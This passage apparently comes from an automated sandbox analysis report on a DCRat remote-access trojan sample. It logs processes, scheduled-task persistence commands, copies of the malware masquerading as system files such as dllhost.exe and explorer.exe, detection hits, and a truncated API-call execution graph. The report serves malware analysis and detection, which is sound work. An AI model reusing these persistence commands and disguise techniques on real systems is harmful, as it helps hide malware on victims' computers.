                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 14 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ChainPortsurrogateC" /sc MINUTE /mo 10 /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Imagebase:0x4a0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Users\Default\Documents\dllhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\dllhost.exe"
                                                          Imagebase:0xa20000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\Documents\dllhost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Users\Default\Documents\dllhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\dllhost.exe"
                                                          Imagebase:0x820000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Imagebase:0x690000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Imagebase:0xee0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Program Files (x86)\jDownloader\config\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                                          Imagebase:0xa50000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\jDownloader\config\explorer.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat"
                                                          Imagebase:0x7ff6490e0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Program Files (x86)\jDownloader\config\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                                          Imagebase:0xa40000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:37
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:07:26:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff6314e0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:07:26:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff730240000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:07:26:13
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Imagebase:0x8d0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:07:26:14
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Imagebase:0x8b0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:07:26:17
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                                          Imagebase:0xae0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:45
                                                          Start time:07:26:22
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:49
                                                          Start time:07:26:33
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:54
                                                          Start time:07:26:40
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:59
                                                          Start time:07:26:44
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:89
                                                          Start time:07:27:21
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1517
                                                            Total number of Limit Nodes:44
                                                            execution_graph 25385 ea400 GdipDisposeImage GdipFree 25446 ed600 70 API calls 25386 f6000 QueryPerformanceFrequency QueryPerformanceCounter 25422 f2900 6 API calls 4 library calls 25447 ff200 51 API calls 25461 fa700 21 API calls 25463 d1710 86 API calls 25425 ead10 73 API calls 25426 fb4ae 27 API calls _ValidateLocalCookies 25390 d1025 29 API calls 25391 ff421 21 API calls __vswprintf_c_l 25448 ec220 93 API calls _swprintf 25427 ef530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25466 eff30 LocalFree 24210 fbb30 24211 fbb42 24210->24211 24212 fbb39 24210->24212 24214 fba27 24212->24214 24215 f97e5 _unexpected 38 API calls 24214->24215 24216 fba34 24215->24216 24234 fbb4e 24216->24234 24218 fba3c 24243 fb7bb 24218->24243 24221 fba53 24221->24211 24224 fba96 24227 f8dcc _free 20 API calls 24224->24227 24227->24221 24228 fba91 24267 f91a8 20 API calls __dosmaperr 24228->24267 24230 fbada 24230->24224 24268 fb691 26 API calls 24230->24268 24231 fbaae 24231->24230 24232 f8dcc _free 20 API calls 24231->24232 24232->24230 24235 fbb5a ___scrt_is_nonwritable_in_current_image 24234->24235 24236 f97e5 _unexpected 38 API calls 24235->24236 24241 fbb64 24236->24241 24238 fbbe8 _abort 24238->24218 24241->24238 24242 f8dcc _free 20 API calls 24241->24242 24269 f8d24 38 API calls _abort 24241->24269 24270 fac31 EnterCriticalSection 24241->24270 24271 fbbdf LeaveCriticalSection _abort 24241->24271 24242->24241 24244 f4636 __fassign 38 API calls 24243->24244 24245 fb7cd 24244->24245 24246 fb7ee 24245->24246 24247 fb7dc GetOEMCP 24245->24247 24248 fb805 24246->24248 24249 fb7f3 GetACP 24246->24249 24247->24248 24248->24221 24250 f8e06 24248->24250 24249->24248 24251 f8e44 24250->24251 24255 f8e14 __dosmaperr 24250->24255 24273 f91a8 20 API calls __dosmaperr 24251->24273 24252 f8e2f RtlAllocateHeap 24254 f8e42 24252->24254 24252->24255 24254->24224 24257 fbbf0 24254->24257 24255->24251 24255->24252 24272 f7a5e 7 API calls 2 library calls 24255->24272 24258 fb7bb 40 API calls 24257->24258 24260 fbc0f 24258->24260 24259 fbc16 24261 efbbc _ValidateLocalCookies 5 API calls 24259->24261 24260->24259 24263 fbc60 IsValidCodePage 24260->24263 24265 fbc85 __cftof 24260->24265 24262 fba89 24261->24262 24262->24228 24262->24231 24263->24259 24264 fbc72 GetCPInfo 24263->24264 24264->24259 24264->24265 24274 fb893 GetCPInfo 24265->24274 24267->24224 24268->24224 24270->24241 24271->24241 24272->24255 24273->24254 24275 fb977 24274->24275 24276 fb8cd 24274->24276 24279 efbbc _ValidateLocalCookies 5 API calls 24275->24279 24284 fc988 24276->24284 24281 fba23 24279->24281 24281->24259 24283 fab78 __vswprintf_c_l 43 API calls 24283->24275 24285 f4636 __fassign 38 API calls 24284->24285 24286 fc9a8 MultiByteToWideChar 24285->24286 24288 fca7e 24286->24288 24289 fc9e6 24286->24289 24290 efbbc _ValidateLocalCookies 5 API calls 24288->24290 24291 fca07 __cftof __vsnwprintf_l 24289->24291 24292 f8e06 __vswprintf_c_l 21 API calls 24289->24292 24293 fb92e 24290->24293 24294 fca78 24291->24294 24296 fca4c MultiByteToWideChar 24291->24296 24292->24291 24298 fab78 24293->24298 24303 fabc3 20 API calls _free 24294->24303 24296->24294 24297 fca68 GetStringTypeW 24296->24297 24297->24294 24299 f4636 __fassign 38 API calls 24298->24299 24300 fab8b 24299->24300 24304 fa95b 24300->24304 24303->24288 24305 fa976 __vswprintf_c_l 24304->24305 24306 fa99c MultiByteToWideChar 24305->24306 24307 fa9c6 24306->24307 24308 fab50 24306->24308 24313 f8e06 __vswprintf_c_l 21 API calls 24307->24313 24315 fa9e7 __vsnwprintf_l 24307->24315 24309 efbbc _ValidateLocalCookies 5 API calls 24308->24309 24310 fab63 24309->24310 24310->24283 24311 faa9c 24340 fabc3 20 API calls _free 24311->24340 24312 faa30 MultiByteToWideChar 24312->24311 24314 faa49 24312->24314 24313->24315 24331 faf6c 24314->24331 24315->24311 24315->24312 24319 faaab 24321 f8e06 __vswprintf_c_l 21 API calls 24319->24321 24325 faacc __vsnwprintf_l 24319->24325 24320 faa73 24320->24311 24322 faf6c __vswprintf_c_l 11 API calls 24320->24322 24321->24325 24322->24311 24323 fab41 24339 fabc3 20 API calls _free 24323->24339 24325->24323 24326 faf6c __vswprintf_c_l 11 API calls 24325->24326 24327 fab20 24326->24327 24327->24323 24328 fab2f WideCharToMultiByte 24327->24328 24328->24323 24329 fab6f 24328->24329 24341 fabc3 20 API calls _free 24329->24341 24332 fac98 __dosmaperr 5 API calls 24331->24332 24333 faf93 24332->24333 24336 faf9c 24333->24336 24342 faff4 10 API calls 3 library calls 24333->24342 24335 fafdc LCMapStringW 24335->24336 24337 efbbc _ValidateLocalCookies 5 API calls 24336->24337 24338 faa60 24337->24338 24338->24311 24338->24319 24338->24320 24339->24311 24340->24308 24341->24311 24342->24335 25394 fc030 GetProcessHeap 25396 ea440 GdipCloneImage GdipAlloc 25449 f3a40 5 API calls _ValidateLocalCookies 25467 101f40 CloseHandle 24367 ecd58 24369 ece22 24367->24369 24374 ecd7b 24367->24374 24381 ec793 _wcslen _wcsrchr 24369->24381 24395 ed78f 24369->24395 24371 ed40a 24372 e1fbb CompareStringW 24372->24374 24374->24369 24374->24372 24375 eca67 SetWindowTextW 24375->24381 24380 ec855 SetFileAttributesW 24383 ec90f GetFileAttributesW 24380->24383 24393 ec86f __cftof _wcslen 24380->24393 24381->24371 24381->24375 24381->24380 24386 ecc31 GetDlgItem SetWindowTextW SendMessageW 24381->24386 24389 ecc71 SendMessageW 24381->24389 24394 e1fbb CompareStringW 24381->24394 24419 eb314 24381->24419 24423 ea64d GetCurrentDirectoryW 24381->24423 24425 da5d1 6 API calls 24381->24425 24426 da55a FindClose 24381->24426 24427 eb48e 76 API calls 2 library calls 24381->24427 24428 f3e3e 24381->24428 24383->24381 24384 ec921 DeleteFileW 24383->24384 24384->24381 24387 ec932 24384->24387 24386->24381 24388 d4092 _swprintf 51 API calls 24387->24388 24390 ec952 GetFileAttributesW 24388->24390 24389->24381 24390->24387 24391 ec967 MoveFileW 24390->24391 24391->24381 24392 ec97f MoveFileExW 24391->24392 24392->24381 24393->24381 24393->24383 24424 db991 51 API calls 2 library calls 24393->24424 24394->24381 24398 ed799 __cftof _wcslen 24395->24398 24396 ed9e7 24396->24381 24397 ed9c0 24397->24396 24403 ed9de ShowWindow 24397->24403 24398->24396 24398->24397 24399 ed8a5 24398->24399 24444 e1fbb CompareStringW 24398->24444 24441 da231 24399->24441 24403->24396 24404 ed8d9 ShellExecuteExW 24404->24396 24411 ed8ec 24404->24411 24406 ed8d1 24406->24404 24407 ed925 24446 edc3b 6 API calls 24407->24446 24408 ed97b CloseHandle 24409 ed994 24408->24409 24410 ed989 24408->24410 24409->24397 24447 e1fbb CompareStringW 24410->24447 24411->24407 24411->24408 24414 ed91b ShowWindow 24411->24414 24414->24407 24415 ed93d 24415->24408 24416 ed950 GetExitCodeProcess 24415->24416 24416->24408 24417 ed963 24416->24417 24417->24408 24420 eb31e 24419->24420 24421 eb3f0 ExpandEnvironmentStringsW 24420->24421 24422 eb40d 24420->24422 24421->24422 24422->24381 24423->24381 24424->24393 24425->24381 24426->24381 24427->24381 24429 f8e54 24428->24429 24430 f8e6c 24429->24430 24431 f8e61 24429->24431 24433 f8e74 24430->24433 24440 f8e7d __dosmaperr 24430->24440 24432 f8e06 __vswprintf_c_l 21 API calls 24431->24432 24437 f8e69 24432->24437 24434 f8dcc _free 20 API calls 24433->24434 24434->24437 24435 f8ea7 HeapReAlloc 24435->24437 24435->24440 24436 f8e82 24456 f91a8 20 API calls __dosmaperr 24436->24456 24437->24381 24440->24435 24440->24436 24457 f7a5e 7 API calls 2 library calls 24440->24457 24448 da243 24441->24448 24444->24399 24445 db6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24445->24406 24446->24415 24447->24409 24449 eec50 24448->24449 24450 da250 GetFileAttributesW 24449->24450 24451 da23a 24450->24451 24452 da261 24450->24452 24451->24404 24451->24445 24453 dbb03 GetCurrentDirectoryW 24452->24453 24454 da275 24453->24454 24454->24451 24455 da279 GetFileAttributesW 24454->24455 24455->24451 24456->24437 24457->24440 25397 ee455 14 API calls ___delayLoadHelper2@8 24491 fc051 31 API calls _ValidateLocalCookies 25469 f7f6e 52 API calls 3 library calls 25398 ec793 107 API calls 4 library calls 25451 f8268 55 API calls _free 25338 d9f7a 25339 d9f8f 25338->25339 25340 d9f88 25338->25340 25341 d9f9c GetStdHandle 25339->25341 25348 d9fab 25339->25348 25341->25348 25342 da003 WriteFile 25342->25348 25343 d9fd4 WriteFile 25344 d9fcf 25343->25344 25343->25348 25344->25343 25344->25348 25346 da095 25350 d6e98 77 API calls 25346->25350 25348->25340 25348->25342 25348->25343 25348->25344 25348->25346 25349 d6baa 78 API calls 25348->25349 25349->25348 25350->25340 25400 d1075 84 API calls 25352 d9a74 25355 d9a7e 25352->25355 25353 d9b9d SetFilePointer 25354 d9bb6 GetLastError 25353->25354 25358 d9ab1 25353->25358 25354->25358 25355->25353 25356 d981a 79 API calls 25355->25356 25357 d9b79 25355->25357 25355->25358 25356->25357 25357->25353 25401 ea070 10 API calls 25452 eb270 99 API calls 25471 d1f72 128 API calls __EH_prolog 25432 eb18d 78 API calls 25403 ec793 97 API calls 4 library calls 25453 ec793 102 API calls 4 library calls 25434 e9580 6 API calls 25405 fb49d 6 API calls _ValidateLocalCookies 25473 d6faa 111 API calls 3 library calls 25436 eeda7 48 API calls _unexpected 25474 ef3a0 27 API calls 25409 fa4a0 71 API calls _free 25410 edca1 DialogBoxParamW 25411 1008a0 IsProcessorFeaturePresent 25475 e1bbd GetCPInfo IsDBCSLeadByte 23461 ef3b2 23462 ef3be ___scrt_is_nonwritable_in_current_image 23461->23462 23493 eeed7 23462->23493 23464 ef3c5 23465 ef518 23464->23465 23469 ef3ef 23464->23469 23566 ef838 4 API calls 2 library calls 23465->23566 23467 ef51f 23559 f7f58 23467->23559 23470 ef42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23469->23470 23504 f8aed 23469->23504 23478 ef48f 23470->23478 23562 f7af4 38 API calls 3 library calls 23470->23562 23476 ef40e 23512 ef953 GetStartupInfoW __cftof 23478->23512 23480 ef495 23513 f8a3e 51 API calls 23480->23513 23482 ef49d 23514 edf1e 23482->23514 23487 ef4b1 23487->23467 23488 ef4b5 23487->23488 23489 ef4be 23488->23489 23564 f7efb 28 API calls _abort 23488->23564 23565 ef048 12 API calls ___scrt_uninitialize_crt 23489->23565 23492 ef4c6 23492->23476 23494 eeee0 23493->23494 23568 ef654 IsProcessorFeaturePresent 23494->23568 23496 eeeec 23569 f2a5e 23496->23569 23498 eeef1 23503 eeef5 23498->23503 23577 f8977 23498->23577 23501 eef0c 23501->23464 23503->23464 23506 f8b04 23504->23506 23505 efbbc _ValidateLocalCookies 5 API calls 23507 ef408 23505->23507 23506->23505 23507->23476 23508 f8a91 23507->23508 23509 f8ac0 23508->23509 23510 efbbc _ValidateLocalCookies 5 API calls 23509->23510 23511 f8ae9 23510->23511 23511->23470 23512->23480 23513->23482 23715 e0863 23514->23715 23518 edf3d 23764 eac16 23518->23764 23520 edf46 __cftof 23521 edf59 GetCommandLineW 23520->23521 23522 edf68 23521->23522 23523 edfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23521->23523 23768 ec5c4 23522->23768 23779 d4092 23523->23779 23528 edf76 OpenFileMappingW 23531 edf8f MapViewOfFile 23528->23531 23532 edfd6 CloseHandle 23528->23532 23529 edfe0 23773 edbde 23529->23773 23536 edfcd UnmapViewOfFile 23531->23536 23537 edfa0 __InternalCxxFrameHandler 23531->23537 23532->23523 23536->23532 23541 edbde 2 API calls 23537->23541 23543 edfbc 23541->23543 23542 e90b7 8 API calls 23544 ee0aa DialogBoxParamW 23542->23544 23543->23536 23545 ee0e4 23544->23545 23546 ee0fd 23545->23546 23547 ee0f6 Sleep 23545->23547 23548 ee10b 23546->23548 23812 eae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23546->23812 23547->23546 23550 ee12a DeleteObject 23548->23550 23551 ee13f DeleteObject 23550->23551 23552 ee146 23550->23552 23551->23552 23553 ee189 23552->23553 23554 ee177 23552->23554 23809 eac7c 23553->23809 23813 edc3b 6 API calls 23554->23813 23557 ee17d CloseHandle 23557->23553 23558 ee1c3 23563 ef993 GetModuleHandleW 23558->23563 24098 f7cd5 23559->24098 23562->23478 23563->23487 23564->23489 23565->23492 23566->23467 23568->23496 23581 f3b07 23569->23581 23572 f2a67 23572->23498 23574 f2a6f 23575 f2a7a 23574->23575 23595 f3b43 DeleteCriticalSection 23574->23595 23575->23498 23624 fc05a 23577->23624 23580 f2a7d 7 API calls 2 library calls 23580->23503 23583 f3b10 23581->23583 23584 f3b39 23583->23584 23586 f2a63 23583->23586 23596 f3d46 23583->23596 23601 f3b43 DeleteCriticalSection 23584->23601 23586->23572 23587 f2b8c 23586->23587 23617 f3c57 23587->23617 23590 f2ba1 23590->23574 23592 f2baf 23593 f2bbc 23592->23593 23623 f2bbf 6 API calls ___vcrt_FlsFree 23592->23623 23593->23574 23595->23572 23602 f3c0d 23596->23602 23599 f3d7e InitializeCriticalSectionAndSpinCount 23600 f3d69 23599->23600 23600->23583 23601->23586 23603 f3c26 23602->23603 23606 f3c4f 23602->23606 23603->23606 23609 f3b72 23603->23609 23606->23599 23606->23600 23607 f3c3b GetProcAddress 23607->23606 23608 f3c49 23607->23608 23608->23606 23610 f3b7e ___vcrt_InitializeCriticalSectionEx 23609->23610 23611 f3bf3 23610->23611 23612 f3b95 LoadLibraryExW 23610->23612 23616 f3bd5 LoadLibraryExW 23610->23616 23611->23606 23611->23607 23613 f3bfa 23612->23613 23614 f3bb3 GetLastError 23612->23614 23613->23611 23615 f3c02 FreeLibrary 23613->23615 23614->23610 23615->23611 23616->23610 23616->23613 23618 f3c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23617->23618 23619 f3c71 23618->23619 23620 f3c8a TlsAlloc 23619->23620 23621 f2b96 23619->23621 23621->23590 23622 f3d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23621->23622 23622->23592 23623->23590 23627 fc077 23624->23627 23628 fc073 23624->23628 23626 eeefe 23626->23501 23626->23580 23627->23628 23630 fa6a0 23627->23630 23642 efbbc 23628->23642 23631 fa6ac ___scrt_is_nonwritable_in_current_image 23630->23631 23649 fac31 EnterCriticalSection 23631->23649 23633 fa6b3 23650 fc528 23633->23650 23635 fa6c2 23636 fa6d1 23635->23636 23663 fa529 29 API calls 23635->23663 23665 fa6ed LeaveCriticalSection _abort 23636->23665 23639 fa6e2 _abort 23639->23627 23640 fa6cc 23664 fa5df GetStdHandle GetFileType 23640->23664 23643 efbc4 23642->23643 23644 efbc5 IsProcessorFeaturePresent 23642->23644 23643->23626 23646 efc07 23644->23646 23714 efbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23646->23714 23648 efcea 23648->23626 23649->23633 23651 fc534 ___scrt_is_nonwritable_in_current_image 23650->23651 23652 fc558 23651->23652 23653 fc541 23651->23653 23666 fac31 EnterCriticalSection 23652->23666 23674 f91a8 20 API calls __dosmaperr 23653->23674 23656 fc546 23675 f9087 26 API calls __cftof 23656->23675 23657 fc564 23662 fc590 23657->23662 23667 fc479 23657->23667 23661 fc550 _abort 23661->23635 23676 fc5b7 LeaveCriticalSection _abort 23662->23676 23663->23640 23664->23636 23665->23639 23666->23657 23677 fb136 23667->23677 23669 fc48b 23673 fc498 23669->23673 23684 faf0a 23669->23684 23671 fc4ea 23671->23657 23691 f8dcc 23673->23691 23674->23656 23675->23661 23676->23661 23682 fb143 __dosmaperr 23677->23682 23678 fb183 23698 f91a8 20 API calls __dosmaperr 23678->23698 23679 fb16e RtlAllocateHeap 23680 fb181 23679->23680 23679->23682 23680->23669 23682->23678 23682->23679 23697 f7a5e 7 API calls 2 library calls 23682->23697 23699 fac98 23684->23699 23687 faf4f InitializeCriticalSectionAndSpinCount 23689 faf3a 23687->23689 23688 efbbc _ValidateLocalCookies 5 API calls 23690 faf66 23688->23690 23689->23688 23690->23669 23692 f8dd7 RtlFreeHeap 23691->23692 23693 f8e00 __dosmaperr 23691->23693 23692->23693 23694 f8dec 23692->23694 23693->23671 23713 f91a8 20 API calls __dosmaperr 23694->23713 23696 f8df2 GetLastError 23696->23693 23697->23682 23698->23680 23700 facc8 23699->23700 23703 facc4 23699->23703 23700->23687 23700->23689 23701 face8 23701->23700 23704 facf4 GetProcAddress 23701->23704 23703->23700 23703->23701 23706 fad34 23703->23706 23705 fad04 __dosmaperr 23704->23705 23705->23700 23707 fad4a 23706->23707 23708 fad55 LoadLibraryExW 23706->23708 23707->23703 23709 fad72 GetLastError 23708->23709 23712 fad8a 23708->23712 23711 fad7d LoadLibraryExW 23709->23711 23709->23712 23710 fada1 